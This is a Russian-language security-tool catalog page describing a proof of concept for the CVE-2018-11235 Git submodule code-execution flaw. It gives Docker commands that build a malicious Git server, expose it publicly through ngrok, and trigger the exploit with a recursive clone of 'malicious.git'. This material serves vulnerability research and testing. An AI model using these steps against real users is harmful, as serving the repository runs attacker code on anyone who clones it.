Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration — CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration | Kitploit
Инструменты/GitHubGitHub/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubtwseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration

cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration

CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
24 лет назадЕщё не проверено

CVE-2018-11235-Git-Submodule-CE + Конфигурация Docker Ngrok

CVE-2018-11235-Git PoC и туннелирование с помощью docker ngrok

Сборка Dockerfile

root@kitploit:~
$ docker build -t cve-2018-11235 .

Создание пользовательской сети для ngrok

root@kitploit:~
$ docker network create myngroknet

Запуск Git HTTP сервера

root@kitploit:~
$ docker run -d -p 8080:80 --net myngroknet --name cve-2018-11235 cve-2018-11235

Запуск Ngrok HTTP сервера для Git сервера

root@kitploit:~
$ docker run -d -p 4040:4040 --net myngroknet --name ngrok wernight/ngrok ngrok http cve-2018-11235:80 --authtoken PUT_YOUR_NGROK_AUTHTOKEN

Теперь вы можете получить доступ к API, чтобы узнать назначенный домен:

root@kitploit:~
$ curl $(docker port www_ngrok 4040)/api/tunnels
{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"https://f5fc-116-206-35-27.ngrok.io","proto":"https","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}},{"name":"command_line (http)","uri":"/api/tunnels/command_line%20%28http%29","public_url":"http://f5fc-116-206-35-27.ngrok.io","proto":"http","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}}],"uri":"/api/tunnels"}

PoC на уязвимом Git сервере

root@kitploit:~
$ git clone --recurse-submodules http://f5fc-116-206-35-27.ngrok.io/malicious.git

Ссылки:

  • CVE-2018-11235 git RCE
  • CVE-2018-11235-Git-Submodule-CE
  • Предоставление сервисов Docker контейнера в интернете с помощью образа ngrok docker
  • wernight/ngrok
  • CVE-2018-11235 - Быстрый и грязный PoC
Скачать инструмент